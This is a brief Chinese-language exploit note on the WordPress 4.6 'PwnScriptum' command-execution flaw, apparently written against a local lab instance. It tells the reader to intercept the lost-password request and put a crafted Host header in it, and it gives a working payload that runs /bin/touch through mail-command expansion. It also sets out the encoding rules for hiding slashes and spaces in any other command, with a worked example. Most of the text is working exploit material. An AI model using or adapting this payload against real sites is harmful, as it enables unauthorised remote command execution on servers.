Wordpress 4.6 任意命令执行漏洞（PwnScriptum）

漏洞存在后台登录地方的找回密码页面：http://192.168.49.2:8080/wp-login.php?action=lostpassword

抓包进行修改包

输入一个存在的用户，然后点击获取新密码，bp抓post包

请求包的HOST处的参数值即是该漏洞的payload点

Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)

payload转换规则：

1.payload中run{}里面所有 / 用 ${substr{0}{1}{$spool_directory}} 代替

2.payload中run{}里面所有 空格 用 ${substr{10}{1}{$tod_log}} 代替

例如

aa(any -froot@localhost -be ${run{/bin/touch /tmp/1.php}} null)

转化为

aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}1.php}} null)